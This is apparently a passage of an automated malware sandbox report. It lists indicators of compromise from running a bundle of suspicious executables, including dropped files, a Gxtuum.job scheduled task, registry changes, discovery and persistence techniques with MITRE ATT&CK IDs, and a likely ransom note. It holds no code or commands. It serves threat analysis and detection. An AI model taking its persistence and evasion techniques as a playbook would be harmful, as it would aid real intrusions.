File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_kn.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_id.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_lv.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\psmachine_64.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_is.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_no.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ru.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\psmachine.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_hu.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_ms.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdate.exe	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_hi.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_pl.dll	ChromeSetup.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdate.exe	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_mr.dll	GoogleUpdate.exe
File opened for modification	C:\Program Files (x86)\Google\Temp\GUT656E.tmp	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleCrashHandler.exe	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdateBroker.exe	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_am.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_mr.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ta.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_tr.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_pt-BR.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_uk.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_da.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateOnDemand.exe	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_nl.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_sv.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_el.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_pt-PT.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdate.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_bg.dll	ChromeSetup.exe

Drops file in Windows directory 2 IoCs

Processes:

t6kzDd6.exeAllNew.exe

description	ioc	Process
File created	C:\Windows\Tasks\Gxtuum.job	t6kzDd6.exe
File created	C:\Windows\Tasks\Gxtuum.job	AllNew.exe

Access Token Manipulation: Create Process with Token 1 TTPs 2 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

Processes:

mshta.exemshta.exe

pid	Process
5972	mshta.exe
4040	mshta.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
behavioral2/files/0x0007000000023cd2-1137.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
persistence privilege_escalation

Accessibility Features
T1546.008

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 30 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
5888	5740	WerFault.exe	183
5356	5740	WerFault.exe	183
3972	5740	WerFault.exe	183
3192	5740	WerFault.exe	183
5144	5740	WerFault.exe	183
5416	5740	WerFault.exe	183
5588	5740	WerFault.exe	183
5796	5740	WerFault.exe	183
404	5740	WerFault.exe	183
5868	5740	WerFault.exe	183
5612	1968	WerFault.exe	221
5956	1968	WerFault.exe	221
5364	1968	WerFault.exe	221
4040	1968	WerFault.exe	221
5748	1968	WerFault.exe	221
2232	1968	WerFault.exe	221
5364	1968	WerFault.exe	221
6900	1968	WerFault.exe	221
7144	1968	WerFault.exe	221
6928	1968	WerFault.exe	221
5428	1968	WerFault.exe	221
7160	1968	WerFault.exe	221
208	1968	WerFault.exe	221
6728	1968	WerFault.exe	221
2100	5716	WerFault.exe	342
7080	4748	WerFault.exe	351
3888	1792	WerFault.exe	362
5888	1968	WerFault.exe	221
7984	1968	WerFault.exe	221
8892	8700	WerFault.exe	461

System Location Discovery: System Language Discovery 1 TTPs 45 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

Gxtuum.exeAllNew.exedef.exenetsh.exeGoogleUpdate.exeSet_up.exewwbizsrvs.exehack1226.exeGoogleUpdate.exeTPB-1.exehttp.exeGoogleUpdate.exewinbox.exeFACTURA09876567000.batdsd.exebitsadmin.exelangla.exeChromeSetup.exeENP.exeGxtuum.exeTORRENTOLD-1.exetvtC9D3.exet6kzDd6.exeGoogleUpdate.exeGoogleUpdate.exemsf.exetimeout.exesvchost.exeuxN4wDZ.exeuxN4wDZ.execmd.execmd.exeschtasks.exeAV_DOW~1.EXEshttpsr_mg.exePORNHU~1.EXEbitsadmin.exerandom.exeaward.pdf.exetranslucently.exepornhub_downloader.exenbea1t8.exeav_downloader1.1.exeGoogleUpdate.exeping.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AllNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	def.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GoogleUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Set_up.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wwbizsrvs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hack1226.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GoogleUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TPB-1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GoogleUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winbox.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FACTURA09876567000.bat
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dsd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	langla.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ChromeSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ENP.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TORRENTOLD-1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tvtC9D3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	t6kzDd6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GoogleUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GoogleUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	uxN4wDZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	uxN4wDZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AV_DOW~1.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shttpsr_mg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PORNHU~1.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	award.pdf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	translucently.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pornhub_downloader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nbea1t8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	av_downloader1.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GoogleUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ping.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

GoogleUpdate.exeping.exeGoogleUpdate.execmd.exe

pid	Process
9128	GoogleUpdate.exe
524	ping.exe
7004	GoogleUpdate.exe
5848	cmd.exe

NSIS installer 2 IoCs

installer

Processes:

resource	yara_rule
behavioral2/files/0x0008000000023e82-3194.dat	nsis_installer_1
behavioral2/files/0x0008000000023e82-3194.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

TPB-1.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	TPB-1.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	TPB-1.exe

Delays execution with timeout.exe 2 IoCs

evasion

Processes:

timeout.exetimeout.exe

pid	Process
2472	timeout.exe
8184	timeout.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exemsedge.exemsedge.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

Processes:

ipconfig.exe

pid	Process
632	ipconfig.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description	flow	ioc
HTTP User-Agent header	900	Go-http-client/1.1

Kills process with taskkill 2 IoCs

evasion

Processes:

taskkill.exetaskkill.exe

pid	Process
9132	taskkill.exe
8460	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133772974190804545"	chrome.exe

Modifies registry class 64 IoCs

Processes:

GoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exeGoogleUpdate.exeGoogleUpdate.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\ = "IAppVersionWeb"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\ProxyStubClsid32	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ProxyStubClsid32	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2}\NumMethods	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2}\ = "IBrowserHttpRequest2"	GoogleUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{9B2340A0-4068-43D6-B404-32E27217859D}\ELEVATION	GoogleUpdate.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\INPROCSERVER32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}"	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}"	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\VersionIndependentProgID	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E}\ = "Google Update Legacy On Demand"	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25461599-633D-42B1-84FB-7CD68D026E53}\VersionIndependentProgID	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25461599-633D-42B1-84FB-7CD68D026E53}\LocalServer32\ = "\"C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\GoogleUpdateOnDemand.exe\""	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4EB61BAC-A3B6-4760-9581-655041EF4D69}	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB}\ProxyStubClsid32	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\ProxyStubClsid32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{27634814-8E41-4C35-8577-980134A96544}\ = "IPolicyStatusValue"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}\ProxyStubClsid32	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{534F5323-3569-4F42-919D-1E1CF93E5BF6}\VersionIndependentProgID	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2D363682-561D-4C3A-81C6-F2F82107562A}\NumMethods	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.Update3WebMachineFallback\CLSID\ = "{598FE0E5-E02D-465D-9A9D-37974A28FD42}"	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4DE778FE-F195-4EE3-9DAB-FE446C239221}\ = "IAppCommand"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}\Elevation\IconReference = "@C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\goopdate.dll,-1004"	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983}\LocalizedString = "@C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\goopdate.dll,-3000"	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.OnDemandCOMClassMachineFallback\CurVer\ = "GoogleUpdate.OnDemandCOMClassMachineFallback.1.0"	GoogleUpdate.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{598FE0E5-E02D-465D-9A9D-37974A28FD42}\ELEVATION	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ADDF22CF-3E9B-4CD7-9139-8169EA6636E4}\ = "Google Update Policy Status Class"	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\NumMethods\ = "4"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{27634814-8E41-4C35-8577-980134A96544}\NumMethods\ = "12"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B3A47570-0A85-4AEA-8270-529D47899603}	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3D05F64F-71E3-48A5-BF6B-83315BC8AE1F}	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\NumMethods\ = "24"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\GoogleUpdate.exe	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\ProxyStubClsid32	GoogleUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{7DE94008-8AFD-4C70-9728-C6FBFFF6A73E}\VERSIONINDEPENDENTPROGID	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\NumMethods\ = "7"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ = "IProgressWndEvents"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}\VersionIndependentProgID\ = "GoogleUpdate.Update3WebMachine"	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\ProxyStubClsid32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.OnDemandCOMClassMachineFallback\ = "Google Update Legacy On Demand"	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.PolicyStatusMachineFallback\ = "Google Update Policy Status Class"	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}"	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4E223325-C16B-4EEB-AEDC-19AA99A237FA}	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\NumMethods	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DB17455-4E85-46E7-9D23-E555E4B005AF}\NumMethods\ = "10"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ = "IJobObserver"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ThreadingModel = "Both"	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ProxyStubClsid32	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983}\ = "Google Update Broker Class Factory"	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6365D39F-2E73-4837-BC59-2014AAA20FA7}\InProcServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\psmachine_64.dll"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}"	GoogleUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}\LOCALSERVER32	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}	GoogleUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\LOCALSERVER32	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E}\LocalServer32\ = "\"C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\GoogleUpdateOnDemand.exe\""	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{31AC3F11-E5EA-4A85-8A3D-8E095A39C27B}	GoogleUpdateComRegisterShell64.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

Processes:

notepad.exenotepad.exe

pid	Process
3612	notepad.exe
6720	notepad.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

ping.exe

pid	Process
524	ping.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
6844	schtasks.exe
1700	schtasks.exe
1576	schtasks.exe
6156	schtasks.exe
1912	schtasks.exe
6404	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

langla.exeTPB-1.exechrome.exenbea1t8.exepowershell.exemsedge.exemsedge.exepowershell.exemsedge.exemsedge.exeidentity_helper.exeGoogleUpdate.exerandom.exe

pid	Process
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
2120	langla.exe
